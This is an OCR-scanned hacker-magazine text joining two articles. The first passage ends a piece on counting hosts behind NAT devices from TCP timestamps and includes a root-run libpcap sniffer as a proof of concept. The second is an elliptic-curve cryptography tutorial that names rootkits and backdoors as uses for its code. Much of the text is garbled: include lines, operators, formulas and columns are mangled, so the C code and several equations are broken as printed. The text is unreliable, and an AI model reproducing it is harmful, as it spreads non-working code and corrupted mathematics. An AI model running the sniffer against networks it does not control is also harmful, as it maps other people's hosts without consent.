multiple to one. By itself this violation has caused so many problems that 
I lost the count of it, but it is pretty sure that the most recurrent 
problem is the FTP transfer. If you use FTP you know what I mean (other can 
look at netfilter ftp conntrack). 


===='[. 34.2 So were does it come from ? 


FTP problem is a good example to explain the origin of the overlap 
specification problem. FTP was specified to work over a one to one 
reliable connexion (TCP in fact). NAT was designed to modify IP. So due to 
protocol dependency it also alter TCP and therefor FTP. 


During NAT specification it was not taken into account that every 
protocol that relies on IP, can conflict with the modified specification. 
To tell the truth ,even if the people that design the NAT mechanism have 
ever wanted to ensure that every protocol that relies on IP can work with 
the NAT they couldn’t make it. 


Why ? because specification are RFC and RFC are in english. English is 
not a good way to specify things especially if you have a dependency graph 
for the specification. 


For example many programming languages have formal specifications. 
Which is a more full proof way. The reason of this lack of formal 
specification resides on the history of Internet[9]. At this time writing a 
simple text was good enough. Nowadays it can be very problematic. 


----[ 3.3 - How do you find it ? 

The big question is, how do I find this bug ?. Well I found this 
problem by formalizing a part of the TCP RFC and confronts the result of 
this analysis to real execution traces. My analyzer (2) warned me about a 
timestamp that was less than the previous one and as you know time does not 
go back... 


I check out why and found this problem. What’s interesting here is that 
the start point to find the bug is the specification rather than the 
implementation as it usually does to find a buffer overflow for example. 


—---[ 3.4 - Back to the future 


So from now on, what will happen ? Well more design errors will be 
found because we cannot change the past and we need to live with it. It is 
not reasonable to say that we can wipe off all that TCP stuff and start a 
new thing from scratch. Internet and network are simply too big to move 
just like that. Just think for one second about the IP v6 deployment and 
you will be convinced. All we can do is try to be as careful as possible 
when designing a new extension or a protocol. Trying to ensure that this 
new stuff does not conflicts with previous specification or breaks 
dependence. We can also try to formalize the protocols as much as we can to 
try and detect errors before they cause problems. Sadly patching is mainly 
our primary option for the coming years. 


--[ 4.0 - Learning from the past aka conclusion 
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The past tells us that protocol is not well enough specified and leads 
to errors (bug, conflict...). It may be time to change our habits and try 
something in ad equation with our time. For example to design things with 
security in mind. In this article I have tried to show you that by simply 
understanding specification and with the help of some basic math you can: 


—- Find a flaw with a worldwide impact. 
—- Exploit this flaw in an elegant manner by the means of a simple theory. 
— Extend fingerprint state of art. 


I hope this will help to convince you that theory and formal tools are a 
necessary part of the computer security field. Next time I will focus on 
simple formal method to find bug. I hope you will be here :). 


--[ A Acknowledgements 


First I would like to thank Romain Bottier for his help and his 
patience. I also want to thank Plops and Poluc for having faith in me. See 
guys we made it! 


I also want to say that I take great care about non disclosure policy. 
I have informed major vendors (Kernel.org, freeBSD, OpenBSD, Cisco...) a 
month ago. As I said I did not get any feedback so I assume they do not 
care. 


References 


HE AT&T Steven M. Bellovin. A Technique for Counting NATted Hosts 

http: //www.research.att.com/~ smb/papers/fnat.pdf 

2 Jacobson, Braden, & Borman. RFC 1323 :TCP Extensions for High 
Performance 

3 K. Egevang, Cray Communications, P. Francis. RFC 1631 : The IP 
Network Address Translator (NAT). 

4 Bret McDanel. TCP Timestamping - Obtaining System Uptime Remotely 
originally posted to Bugtraq Security Mailing List on March 11, 2001. 
3) Michal Zalewski. pOf 2:Dr. Jekyll had something to Hyde. 

6 Fyodor. Nmap - Free Security Scanner For Network Exploration & 
Security Audits. 

7 Antirez. dumbscan original BUGTRAQ posting (18 Dec 1998) 

8 Microsoft. TCP timestamp in windows : KB224829. 

9 Hafner, Katie, Matthew Lyon. Where Wizards Stay Up Late: The Origins 
of the Internet. 


FootNotes 


(1) Microsoft point of view is that NAT 
do not want to patch. 


is not a security mechanism so they 


(2) If you are interested about my analyzer. I hope to publish soon a 
theoric paper on how it works. I also hope to release one day a version 
of it. To the question did I find other interesting things, the answer 
is: maybe I need to check out more deeply. 


-—-[ B - Proof of concept 


/* 

* Proof Of Concept : counting host behind a NAT using timestamp 
* To compile this file, you will need the libpcap 

* Copyright Elie Bursztein (lupin@zonart.net) 
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Successfully compiled on FreeBSD 5.X and Linux 2.6.X 


* 
* 
* Sgcc natcount.c -o natcount -I/usr/local/include -L/usr/local/lib 
* -lpcap 

* 


define __USE_BSD 1 


include <sys/time.h> 
include <time.h> 
include <netinet/in.h> 
1 

1 


include <net/ethernet.h> 
ifdef _ FreeBSD __ 

include <netinet/in_systm.h> 
endif /* __FreeBSD_ */ 

i fF linux __ 

include <linux/if_ether.h> 
endif /* __linux__ */ 


nclude <netinet/ip.h> 
nclude <stdlib.h> 
nclude <string.h> 
nclude <pcap.h> 

nclude <sys/socket.h> 
nclude <netinet/in.h> 
nclude <netinet/ip.h> 
nclude <net/if.h> 
nclude <netinet/tcp.h> 
nclude <netinet/udp.h> 


ee ee ee 


< 
< 
< 
< 


ifdef — linux __ 
define th_off doff 
endif /* _ linux __ */ 


Wz PNES? -t addr = 0; 


/* chain lists structures */ 

typedef struct listes_s { 
struct listes_s *next; 
void *elt; 

} listes_t; 


/* Structures for TCP options */ 
typedef struct { u_int32_t ts, ts_r; } timestamp_t; 
typedef struct { timestamp_t *ts; } tcp_opt_t; 


/* Structures for datas storage */ 

typedef struct { u_int32_t from, first_timestamp; struct timeval 
first_seen; } machine_t; 

typedef struct { u_int32_t host, nat; struct timeval first_seen; } 
nat_box_t; 


#define TIMESTAMP_ERROR_MARGIN 0.5 


#define DELAY 1 
/* 
* List functions 
* 
int add_in_list(listes_t **list, void * elt) {f 


listes_t *lst; 
lst = malloc(sizeof (listes_t)); 
lst->next = *list; 

lst->elt = elt; 

*list = lst; 

return (1); 


void show_nated(listes_t *list) { 
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nat_box_t *nat; 
struct in_addr addr; 


printf("-- Begin of nated IP list --\n"); 
while (list) 
{ 
nat = (nat_box_t *) list->elt; 
if (mat->nat > 1) { 
addr.s_addr = nat-—>host; 
printf("I’ve guess %i computers sharing the same IP address 
(s)\n", nat->nat, inet_ntoa(addr)); 
} 
list = list->next; 
} 
printf("-- End of nated IP list --\n"); 


} 


/* 
* Function used to get all TCP options 
* Simple TCP options parser 


a, 
int tcp_option_parser(const u_char *options, 
tcp_opt_t *parsed, 
unsigned int size) { 
u_int8_t kind, len, i; 


bzero(parsed, sizeof (tcp_opt_t)); 


i= 0; 
kind = *(options + i); 
while (kind != 0) /* EO */ 


{ 
switch (kind) { 


case 1: itt; break; /* NOP byte */ 
case 2: i += 4; break; 
case 3: i += 3; break; 
case 4: i += 2; break; 
case 5: /* skipping SACK options */ 
len = (*options + ++i) - 1; 
i += len; 
break; 
case 6: i += 6; break; 
case 7: i += 6; break; 
case 8: 
i += 2; 
parsed->ts = (timestamp_t *) (options + i); 
i += 8; 
return (1); 
break; 
default: 
itt; 
} 
kind = *(options + i); 
} 
return (0); 
} 
/* 
* Most interesting function ... Here we can know if a TCP packet is 
* coming from someone we already know ! 
* Algo 
* fine (seconds) = current_packet_time - first_packet_time <- tim 
* between 2 packets 
* ts_inc = inc_table[i] * finc <- our supposed timestamp increment 
* between 2 packets 
* new_ts = first_timestamp + ts_inc <- new = timestamp we should have 
* now ! 
* 
* 


Now we just have to compare new_ts with current timestamp 
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* We can authorize an error margin of 0.5% 
* 
* Our inc_table contain timestamp increment per second for most 
* Operating System 
mf: 
int already_seen(machine_t *mach, tcp_opt_t *opt, 
struct timeval temps) 


{ 


int inc_table[4] = {2, 10, 100, 1000}; 

unsigned int new_ts; 

float finc, tmp, ts_inc; 

int He Oi h; 

finc = ((temps.tv_sec - mach->first_seen.tv_sec) * 1000000. 
+ (temps.tv_usec - mach->first_seen.tv_usec)) / 1000000.; 


for (i = 0; i < 4; i++) { 


ts_inc inc_table[i] * finc; 

new_ts = ts_inc + mach->first_timestamp; 
diff = ntohl(opt->ts->ts) new_ts; 

if (diff == 0) { /* Perfect shoot ! */ 


return (2); 
} 
tmp = 100. —- (new_ts * 100. / ntohl(opt-—>ts->ts)); 
if (tmp < 0.) 

tmp. *= -Ll.; 
if (tmp <= TIMESTAMP_ERROR_MARGIN) { /* Update timestamp and time */ 

mach->first_seen = temps; 

mach->first_timestamp = ntohl(opt->ts->ts); 

return (1); 


} 


return (0); 


/* 
* Simple function to check if an IP address is already in our list 
* If not, it’s only a new connection 


Kf 
int is_in_list(listes_t *lst, u_int32_t addr) {f{ 
machine_t *mach; 


while (lst) { 
mach = (machine_t *) lst->elt; 
if (mach->from == addr) 
return (1); 
lst = lst->next; 
} 


return (0); 


/* 
* This function should be call if a packet from an IP address have been 
* found, 

* is address is already in the list, but doesn’t match any timestamp 
* value 

ef; 
int update_nat(listes_t *list, u_int32_t addr) 
{ 

nat_box_t *box; 


while (list) 
{ 
box = (nat_box_t *) list->elt; 
if (box->host == addr) 
{ 
box->nattt; 
return: -(1')3 
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list = list->next; 
} 


return (0); 


int check_host (listes_t **list, listes_t **nat, u_int32_t 
from, 
tcp_opt_t *opt, struct timeval temps) { 
listes_t Ast; 
machine_t *mach; 
int found, zaped; 


found = zaped = 0; 


lst = *list; 
(] 


while lst && !(found)) { 
mach = (machine_t *) lst->elt; 
if (mach->from == from) { 
if ( temps.tv_sec - mach->first_seen.tv_sec > DELAY ) { 


found = already_seen(mach, opt, temps); 
} else zaped = 1; 
} 
lst = lst->next; 


} 


if (!(zaped) && !(found)) { 
mach = malloc(sizeof (machine_t)); 
mach->from = from; 


mach->first_seen = temps; 
mach->first_timestamp = ntohl(opt-—>ts->ts); 
add_in_list(list, mach); 
update_nat(*nat, from); 
show_nated(*nat); 
return (1); 

} 


return (0); 


void callback_sniffer(u_char *useless, 
const struct pcap_pkthdr* pkthdr, 
const u_char *packet) 


{ 


static listes_t *list_machines = 0; 

static listes_t *list_nat = 0; 

const struct ip * ip. AF 

const struct tcphdr *tcp.h; 

tcp_opt_t tcp_opt; 

machine_t *mach; 

nat_box_t *nat; 

struct in_addr my_addr; 

ip_h = (struct ip *) (packet + sizeof(struct ether_header) ); 
if (ip_h->ip_p == IPPROTO_TCP) 


tcp_h = (struct tcphdr *) (packet + sizeof(struct ether_header) 4 
sizeof (struct ip)); 
if (tcp_h->th_off * 4 > 20) { 
if (tcp_option_parser((u_char *) (packet + sizeof (struct 
ether_header) 


+ sizeof(struct ip) + 
sizeof (struct tcphdr)), 
&tcp_opt, tcp_h->th_off * 4 - 20)) 
{ 
if (is_in_list(list_machines, (ip_h->ip_src).s_addr)) { 
check_host (&list_machines, &list_nat, (u_int32_t) 
(ip_h->ip_src).s_addr, &tcp_opt, pkthdr->ts); 
} else { 


3.txt Wed Apr 26 09:43:44 2017 21 


if (ntohl(tcp_opt.ts->ts) != 0) 
{ 
addr = (ip_h->ip_src) .s_addr; 
my_addr.s_addr = addr; 
mach = malloc(sizeof (machine_t)); 
mach->from = (ip_h->ip_src).s_addr; 
mach->first_seen = pkthdr->ts; 
mach->first_timestamp = ntohl(tcp_opt.ts->ts); 
nat = malloc(sizeof (nat_box_t)); 


nat->host = (u_int32_t) (ip_h->ip_src) .s_addr; 
nat->nat = 1; 
nat->first_seen = mach->first_seen; 


add_in_list (élist_machines, mach); 
add_in_list(&list_nat, nat); 

} 

} 


int main(int ac, char *argv[]) 
{ 
pcap_t *sniff; 
char errbuf [PCAP_ERRBUF_SIZE]; 
struct bpf_program fp; 
char *device; 


bpf_u_int32 maskp, netp; 
struct in_addr my_ip_addr; 
char filter[250]; 


if (getuid() != 0) { 
printf("You must be root to use this tool.\n"); 
exit (2); 
} 
if (--ac != 1) 
{ 
printf ("Usage: ./natcount xl0\n"); 
return (1); 


} 


device = (+targv) [0]; 

pcap_lookupnet (device, é&netp, &émaskp, errbuf); 

my_ip_addr.s_addr = (u_int32_t) netp; 

printf ("Using interface %s IP : %s\n", device, inet_ntoa(my_ip_addr) ); 
if ((sniff = pcap_open_live (device, BUFSIZ, 1, 1000, errbuf)) == NULL) 


printf ("ERR: %s\n", errbuf); 
exit(1); 
} 
bzero(filter, 250); 
snprintf (filter, 250, "not sre net %s", inet_ntoa(my_ip_addr)); 


if (pcap_compile(sniff,éfp, filter, 0, netp) == -1) { 
fprintf(stderr,"Error calling pcap_compile\n"); 
exit (1); 


} 
if (pcap_setfilter(sniff,&fp) == -1) { 
fprintf(stderr,"Error setting filter\n"); 
exit(1); 


} 
pcap_loop(sniff, -1, callback_sniffer, NULL); 
return (0); 
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2. It provides ready-to-use source code. The C code included and 
described in this article (about 500 lines in total) contains a 
complete secure public key crypto system (including symmetric 
components: a block cipher, a hash function and a MAC) and is 
released to the public domain. 


The code doesn’t link against external libraries, be they of 
bigint, cryptographic or other flavour; an available libc is 
sufficient. This satisfies the typical hacker need for compact and 
independent programs that have to work in "inhospitable" 
environments; rootkits and backdoors seem to be interesting 
applications. 


As mentioned above the theory behind EC cryptography is rather 
complex. To keep this article brief and readable by J. Random Hacker 
only the important results are mentioned, theorems are not proven, 
nasty details are omitted. If on the other hand you are into maths and 
want to become an ECC crack I encourage to start reading [G2ECC] or 
[ECIC]. 


[rek Algebraical Groups and Cryptography 


Definition. A set G together with an operation G x G -> G denoted by 
‘+’ is called an (abelian algebraical) group if the following axioms 
hold: 


Gl. The operation ’+’ is associative and commutative: 


(a + b) Cc a Coxe) for all a,b,c in G 
a b b a for all a,b inG 


G2. G contains a neutral element ’0’ such that 


a+ 0 a O+a for all ainG 


G3. For each element ’a’ in G there exists an "inverse element", 
denoted by ’-a’, such that 


For a group G the number of elements in G is called the group order, 
denoted by |G]. 


Example. The sets Z, Q and R of integers, rational numbers and real 
numbers, respectively, form groups of infinite order in respect to 
their addition operation. The sets Q* and R* (Q and R without 0) also 
form groups in respect to multiplication (with 1 being the neutral 
element and 1/x the inverse of x). 


Definition. Let G be a group with operation ’+’. A (nonempty) subset H 
of G is called a subgroup of G if H is a group in respect to the same 
operation /+’. 


Example. Z is a subgroup of Q is a subgroup of R in respect to ’+’. 
In respect to ’*’ Q* is a subgroup of R*. 


Theorem (Lagrange). Let G be a group of finite order and H be a 
subgroup of G. Then |H| properly divides |G|. 


It follows that if G has prime order, G has only two subgroups, 
namely {0} and G itself. 
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We define the "scalar multiplication" of a natural number k with a 
group element g as follows: 


kK * gi=gtg 
\ 


Theorem. For a finite group G and an element g in G the set of all 
elements k * g (k natural) forms a subgroup of G. This subgroup 
is named the "cyclic subgroup generated by g". 


Thus a prime order group is generated by any of its nonzero elements. 


We now introduce the Diffie-Hellman Key Exchange protocol: let G be a 
prime order group and g a nonzero element. Let two players, called 
Alice and Bob respectively, do the following: 


1. Alice picks a (secret) random natural number ’a’, calculates 
P =a * g and sends P to Bob. 


2. Bob picks a (secret) random natural number ’b’, calculates 
Q=b * g and sends Q to Alice. 


3. Alice calculates S=a* Q=a* (b * Q). 
4. Bob calculates T=b* P=b* (a * g). 


By definition of the scalar multiplication it is apparent that S = 

T. Therefore after step 4 Alice and Bob possess the same value S. The 
eavesdropper Eve, who recorded th xchanged messages P and Q, is able 
to calculate the same value if she manages to determine ’a’ or 

'b’. This problem (calculating ’a’ from G, g and ’a * g’) is called 
the group’s Discrete Logarithm Problem (DLP). 


In groups where DLP is too ’hard’ to be practically solvable it is 
believed to be out of reach for eavesdroppers to determine the valu 
S, hence Alice and Bob can securely establish a secret key which can 
be used to protect further communication. 


If an attacker is able to intercept the transmission of P and Q and to 
replace both by the group’s neutral element, obviously Alice and Bob 
are forced to obtain S = 0 = T as shared key. This has to be 
considered a successful break of the crypto system. Therefore both 
Alice and Bob have to make sure that the received elements Q and P, 
respectively, indeed do generate the original group. 


The presented DH scheme may also serve as public key encryption scheme 
(called ElGamal encryption scheme): let Alice pick a random natural 
number ‘a’ as private key. Th lement P = a * g is the corresponding 
public key. If Bob wants to encrypt a message for her, he picks a 
random number ‘’b’, symmetrically encrypts the message with key T = b * 
P and transmits the cipher text along with Q = b * g to Alice. She 

can reconstruct T= S via S =a * Q and then decrypt the message. 

Note the direct relationship between this and the DH scheme! 


Conclusion: Cryptographers are always seeking for finite prime order 
groups with hard DLP. This is where elliptic curves come into play: 
they induce algebraical groups, some of them suitable for DH and 
ElGamal crypto systems. Moreover the elliptic curve arithmetic 
(addition, inversion) is implementable in a relatively efficient way. 


You will find more information about groups and their properties in 
[Groups], [Lagrange], [CyclicGroups] and [GroupTheory]. Read more 
about the DLP, DH key exchange and ElGamal encryption in [DLP], [DH] 
and [ElGamal]. 


= 
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---[ 2 - Finite Fields, Especially Binary Ones 


Definition. A set F together with two operations F x F -> F named 
‘+’ and ’*’ is called a field if the following axioms hold: 


Fl. (F, +) forms a group 


F2. (F*, *) forms a group (where F* is F without the 
'+’-neutral element ’0’) 


F3. For all a,b,c in G the distributive law holds: 


a * (b + c) = (a * b) + (a * Cc) 


For ’a + (-b)’ we write shorter ’a - b’. Accordingly we write ’a / b’ 
when we multiply ‘a’ with the ’*’-inverse of b. 


To put it clearly: a field is a structure with addition, substraction, 
multiplication and division that work the way you are familiar with. 


Example. The sets Q and R are fields. 


Theorem. For each natural m there exists a (finite) field GF(2*%m) with 
exactly 2%m elements. Fields of this type are called binary fields. 


Elements of binary fields GF(2%m) can efficiently be represented by 
bit vectors of length m. The single bits may be understood as 
coefficients of a polynomial of degree < m. To add two field elements 
g and h just carry out the polynomial addition g + h (this means: the 
addition is don lement-wise, i.e. the bit vectors are XORed 
together). The multiplication is a polynomial multiplication modulo a 
certain fixed reduction polynomial p: the elements’ product is the 
remainder of the polynomial division (g * h) / p. 


The fact that field addition just consists of a bitwise XOR already 
indicates that in binary fields F each element is its own additive 
inverse, that is: a+t+ae= 0 for all ain F. For a,b in F as 
consequence 2*a*b a*b + axb 0 follows, what leads to the (at the 
first glance surprising) equality 


(a + b)*2 = a%2 + b*2 for all a,b in F. 


More about finite fields and their arithmetical operations can be 
found in [FiniteField], [FieldTheory], [FieldTheoryGlossary] and 
especially [FieldArithmetic]. 


---[ 3 - Elliptic Curves and their Group Structure 


Definition. Let F be a binary field and ’a’ and ’b’ elements in F. 
The set E(a, b) consisting of an element ’0’ (the "point at 
infinity") plus all pairs (x, y) of elements in F that satisfy 
the equation 


y°2 + x*y KOSS aK 2 tb 


is called the set of points of the binary elliptic curve E(a, b). 


Theorem. Let E = E(a, b) be the point set of a binary elliptic curve 
over the field F = GF(2%m). Then 


1. E consists of approximately 2%m elements. 
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2. If (x, y) is a point on E (meaning x and y satisfy the above 
equation) then (x, y + x) is also a point on E. 


3. If two points P = (xl, yl) and Q = (x2, y2) on E with xl != x2 are 
connected by a straight line (something of the form y = m*x + b), 
then there is exactly one third point R = (x3, y3) on E that is 
also on this line. This induces a natural mapping f:(P, Q) -> R, 
sometimes called chord-and-tangent mapping. 


Exercise. Prove the second statement. 


The chord-and-tangent mapping ’f’ is crucial for the group structure 
given naturally on elliptic curves: 


a) The auxiliary element ’0’ will serve as neutral element which may 
be added to any curve point without effect. 


b) For each point P = (x, y) on the curve we define the point 
-P := (x, y + x) to be its inverse. 
c) For two points P = (xl, yl) and Q = (x2, y2) the sum ’P + Q’ 


is defined as -f£(P, Q). 


It can be shown that the set E together with the point addition ‘+’ 
and the neutral element ’o’ defacto has group structure. If the 
urve’s coefficients ’a’ and ’b’ are carefully chosen, there exist 


C 
points on E that generate a prime order group of points for which the 
DLP is hard. Based on these groups secure crypto systems can be built. 


The point addition on curves over the field R can be visualized. See 
EllipticCurve] for some nice images. 


aoe 


In ECC implementations it is essential to have routines for point 
addition, doubling, inversion, etc. We present pseudocode for the 
most important ones: 


Let (x, y) be a point on the elliptic curve E(a, b). The point 
(x’, y’) := 2 * (x, y) can be computed by 


BP TAD de Le a 


For two points P = (xl, yl), Q = (x2, y2) the sum (x3, y3) =P +0Q 
can be computed by 


l= (y2 + yl) / (x2 + x1) 
x3 AQ: ty see ARO? Seal 
y3 = 1(x1l + x3) + x3 + yl 


return (x3, y3) 


Some special cases where the point at infinity ’0’ has to be 
considered have been omitted here. Have a look at [PointArith] for 
complete pseudocode routines. But nevertheless we s that point 
arithmetic is easy and straight forward to implement. A handful of 
field additions, multiplications plus a single division do the job. 


The existence of routines that do point doubling and addition is 
sufficient to be able to build an efficient "scalar multiplier": a 
routine that multiplies a given curve point P by any given natural 
number k. The double-and-add algorithm works as follows: 


Hoo! 
let n be the number of the highest set bit in k 
while(n >= 0) { 

H= 2 * H; 
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if the nth bit ink is set: 
H=H +P; 
ney 
} 


return H; 


Example. Suppose you want to calculate k*P for k = 11 = 1011b. Then 
n is initialized to 3 and H calculated as 


i ‘of + P)) +P) +P 


* 
th Pe B 


ll 
PMN DN 


Some elliptic curves that are suitable for cryptographic purposes have 
been standardized. NIST recommends 15 curves (see [NIST]), among them 
five binary ones called B163, B233, B283, B409 and B571. The 
parameters of B163 are the following ([NISTParams]): 


Field: GF (2%163) 

Reduction poly: P(t) = t*163 + £47 + £°6 + t*3 + 1 
Coefficient a: 1 

Coefficient b: 20a601907b8c953cal481eb10512£78744a3205fd 


x coordinate of g: 3f0ebal6286a2d57ea0991168d4994637e8343e36 
y coordinate of g: Od51lfbc6c71a0094fa2cdd545b11c5c0c797324F1 
group order: 2 * 5846006549323611672814742442876390689256843201587 


The field size is 2%163, the corresponding symmetric security level is 
about 80 bits (see chapter 4). The field elements are given in 
hexadecimal, the curve’s order in decimal form as h * n, where h (the 
"cofactor") is small and n is a large prime number. The point g is 
chosen in a way that the subgroup generated by g has order n. 


The source code included in this article works with B1l63. It can 
easily be patched to support any other binary NIST curve; for this it 
is sufficient to alter just 6 lines. 


Exercise. Try it out: patch the sources to get a B409 crypto 
system. You will find the curve’s parameters in [NISTParams]. 


Read [EllipticCurve], [PointArith] and [DoubleAndAdd] for further 
information. 


---[ 4 - On the Security of Elliptic Curve Cryptography 


We learned that the security of the DH key exchange is based on the 
hardness of the DLP in the underlying group. Algorithms are known that 
determine discrete logarithms in arbitrary groups; for this task no 
better time complexity bound is known than that for Pollard’s "Rho 
Method" ([PollardRho]): 


Theorem. Let G be a finite (cyclic) group. Then there exists an 
algorithm that solves DLP in approximately sqrt(|G|) steps (and low 
memory usage). 


For elliptic curves no DLP solving algorithm is known that performs 
better than the one mentioned above. Thus it is believed that the 
ECCDLP is "fully exponential" with regard to the bit-length of 

|G|. RSA and classical DH systems can, by contrast, be broken in 
"subexponential" time. Hence their key lengths must be larger than 
those for ECC systems to achieve the same level of security. 


We already saw that elliptic curves over GF(2%m) contain about 2%m 
points. Therefore DLP can be solved in about sqrt(2*%m) steps, that is 
2*°(m/2). We conclude that m-bit ECC systems are equivalent to 
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(m/2)-bit symmetric ciphers in measures of security. 


The following table compares equivalent key sizes for various crypto 
systems. 


ECC key size RSA key size DH key size AES key size 


| | | 
160 | 1024 | 1024 | (80) 
256 | 3072 | 3072 | 128 
384 | 7680 | 7680 | 192 
512 | 15360 | 15360 | 256 


---[ 5 - The ECIES Public Key Encryption Scheme 


Earlier we presented the DH Key Exchange and the ElGamal public key 
crypto system built on top of it. The Elliptic Curve Integrated 
Encryption Scheme (ECIES, see ANSI X9.63) is an enhancement of E1Gamal 
encryption specifically designed for EC groups. ECIES provides 
measures to defeat active attacks like the one presented above. 


Let E be an elliptic curve of order h * n with n a large prime 


number. Let G be a subgroup of E with |G| = n. Choose a point P in G 
unequal to ’0’. 


We start with ECIES key generation: 


Alice picks as private key a random number ’d’ with 1 <=d <n; 
She distributes the point Q :=d * P as public key. 


If Bob wants to encrypt a message m for Alice he proceeds as follows: 


Pick a random number ’k’ with 1 <= k <n. 

Compute Z=h * k * Q. 

If Z2 = '’0'’ goto step 1. 

Compute R= k * P. 

Compute (k1, k2) = KDF(Z, R) (see below). 

Encrypt m with key kl. 

Calculate the MAC of the ciphertext using k2 as MAC key. 
Transmit R, the cipher text and the MAC to Alice. 


OAANHNDHPWNE 


Alice decrypts the cipher text using the following algorithm: 


1. Check that R is a valid point on the elliptic curve. 
2. Compute Z=h *d* R. 

3. Check Z != 'o’. 

4. Compute (kl, k2) = KDF(Z, R) (see below). 

5. Check the validity of the MAC using key k2. 

6. Decrypt m using key kl. 

If any of the checks fails: reject the message as forged. 


KDF is a key derivation function that produces symmetric keys kl, k2 
from a pair of elliptic curve points. Just think of KDF being the 
cryptographic hash function of your choice. 


ECIES offers two important features: 


1. If an attacker injects a curve point R that does not generate a 
large group (this is the case in the attack mentioned above), this 
is detected in steps 2 und 3 of the decryption process (the 
cofactor plays a fundamental role here). 


2. The message is not only encrypted in a secure way, it is also 
protected from modification by a MAC. 
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Implement a DH key exchange. 
Let G be a subgroup of E 


29 


Let E 


= 


with |G| 


Let Alice and Bob proceed 


with 1 <= a< n and 


ES_public_key_validation routine). 


1. Alice picks a random number ’a’ 
to Bob. 

2. Bob picks a random number ‘'b’ 
to Alice. 

36 
of order n (see the ECI 
calculates S =a * Q. 

4. 


ordern n. 


If everything went OK the equality S 


He calculates T 


be Bs 


T should hold. 


with 1 <= b < n and sends Q = b 


be a binary elliptic 


n. Choose a 
as follows: 


sends P 


* 


g 


Alice checks that Q is a point on the curve that generates a group 


Alice 


Bob checks that P is a point on the curve that generates a group of 


S236 


XT 


-— The XTEA Block Cipher, 


CBC-MAC and Davies-Meyer Hashing 


EA is the name of a patent-fr 


secur 


Wheeler and Needham in 1997. 


block cipher invented by 


bits long. 


The main benefit of XT 


The block size is 64 bits, 


etc is the compact description of the algorithm: 


void encipher(unsigned long m[], 


{ 


unsigned long key[]) 


EFA over its competitors AES, 


keys are 128 
Twofish, 


(sum + key[sum >> 11 & 3]); 


unsigned long sum = 0, delta = 0x9E3779B9; 
int i; 
for(i = 0; i < 32; itt) { 
m[O] += ((m[1] << 4 * m[1] >> 5) + m[1]) * (sum + key[sum & 3]); 
sum += delta; 
m[l] += ((m[0O] << 4 * m[O] >> 5) + m[O]) % 
} 
} 
Let E be a symmetric encryption function with block length n, 


initialized with key k. 
follows: 


1. Split m in n-bit-long submessages ml, m2, m3, 

2. Calculate the intermediate values tO = E(length(m)), 
tl = E(ml XOR t0), t2 = E(m2 XOR t1), t3 = E(m3 XOR 

3. Return the last value obtained in step 2 as MAC(k, 


discard .t0,. t1,--t2, 


Next we show how a block cipher ca 
"Davies-Meyer" construction. 


hash function using the 


n be used to build a 


message that is to be hashed. Let 


E (key, block) 


m) 


The CBC-MAC of a message m is calculated as 


t2), 


and 


cryptographic 


Let m be the 
be a symmetric 


encryption function with block length n and key length l. 


BE 
By 


(m2, hl) XOR 


1. Split m in 1-bit-long submessages ml, m2, m3, 

2. Calculate the intermediate values hl = E(ml, 0), h2 
hl, h3 = E(m3, h2) XOR h2, 

3. If h is the last intermediate value obtained in step 2 return 
E(length(m), h) XOR h as hash value and discard hl, 


Ho: HS; 


The code included in this article uses the block cipher XTEA in 
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counter mode ( 
authenticity; 


CTR) for encryption, a CBC-MAC garantees message 
finally KDF (see chapter 5) is implemented using XTEA in 


Davies-Meyer mod 


Read [XTEA] an 


d [DMhashing] to learn more about the XTEA block cipher 


and the Davies 


soa [2 = PUcEeL 


Meyer construction. 


ng Everything Together: The Source Code 


The public domain source code you find at the end of this document 


implements the 
B163. The code 


1. The central 
length. It 

and suchlik 
Appropriate 
importing f 


2. The functio 


ECIES public key encryption system over the curv 
is commented, but we outline the design here. 


data structure is a bit vector of fixed but "long" 

is the base data type used to represent field elements 
The dedicated typedef is called bitstr_t. 

routines for bit manipulation, shifting, bitcounting, 

rom an ASCII/HEX representation, etc do exist. 


ns with "field_" prefix do the field arithmetic: 


addition, multiplication and calculation of the multiplicative 


inverse of 


3. ECC points 
bitstr_t), 
functions p 
implement b 
etc. 


4. The functio 
to compute 


5. The "XTEA"- 


6. The "ECIES_ 


ECIES_gener 
ECIES_publi 


7. A demonstra 


program’s main() section. 


The code may b 


gcc -O2 -o 


---[ 8 - Concl 


lements are the important routines. 


are represented as pairs of elem_t (an alias for 

the special point-at-infinity as the pair (0,0). The 
refixed with "point_" act on elliptic curve points and 
asic point operations: point addition, point doubling, 


n "point_mult" implements the double-and-add algorithm 
"k * (x,y)" in the way described in chapter 3 


prefixed functions implement the XTEA block cipher, 


but also the CBC-MAC and the Davies-Meyer construction. 


"-routines do the ECIES related work. 
ate_key_pair() generates a private/public key pair, 
c_key_validation() checks that a given point is 


on the curve and generates a group of order "n" 
ECIES_encryption/ECIES_decryption do what their names imply. 


tion of the main ECIES functionalities is given in the 


e compiled like this: 


€cc €CC.Cc 


usion 


We have seen how crypto systems are built upon algebraical groups that 


have certain p 
class of appro 
elliptic curve 
scheme ECIES ( 


roperties. We further gave an introduction into a special 
priate groups and their theory, namely to the binary 
s. Finally we presented the secure public key encryption 
together with necessary symmetrical components). All 


this is implemented in the source code included in this article. 


We recall that 
was compactnes 
cryptography b 
routines ande 


besides security the central design goal of the code 
s, not speed or generality. Libraries specialized on EC 
enefit from assembler hand-coded field arithmetic 

asily perform a hundred times faster than this code. 
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If compactness is not essential for your application you might opt for 
linking against one of the following ECC capable free crypto libraries 
instead: 


Cryptot+ (C++) http://www.eskimo.com/~ weidai/cryptlib.html 
Mecca (C) http://point-at-infinity.org/mecca/ 
LibTomCrypt (C) http://libtomcrypt.org/ 


borZoi (Ct+/Java) http://dragongate-technologies.com/products.html 


-—--[ 9 — Outlook 


You have learned a lot about elliptic curves while reading this 
article, but there still remains a bunch of unmentioned ideas. W 
list some important ones: 


1. Elliptic curves can be defined over other fields than binary ones. 
Let p be a prime number and Z_p the set of nonnegative integers 
smaller than p. Then Zp forms a finite field (addition and 
multiplication have to be understood modulo p, see 
[ModularArithmetic] and [FiniteField]). 


For these fields the elliptic curve E(a, b) is defined to be the 
set of solutions of the equation 


y*2 = x*3 + ax + b 


plus the point at infinity ’o’. Of course point addition and 
doubling routines differ from that given above, but essentially 
these "prime curves" form an algebraical group in a similar way as 
binary curves do. It is not that prime curves are more or less 
secure than binary curves. They just offer another class of groups 
suitable for cryptographic purposes. 


NIST recommends five prime curves: P192, P224, P256, P384 and P521. 


2. In this article we presented the public key encryption scheme 
ECIES. It should be mentioned that ECC-based signature schemes 
(see [ECDSA]) and authenticated key establishment protocols ([MQV]) 
do also exist. The implementation is left as exercise to the 
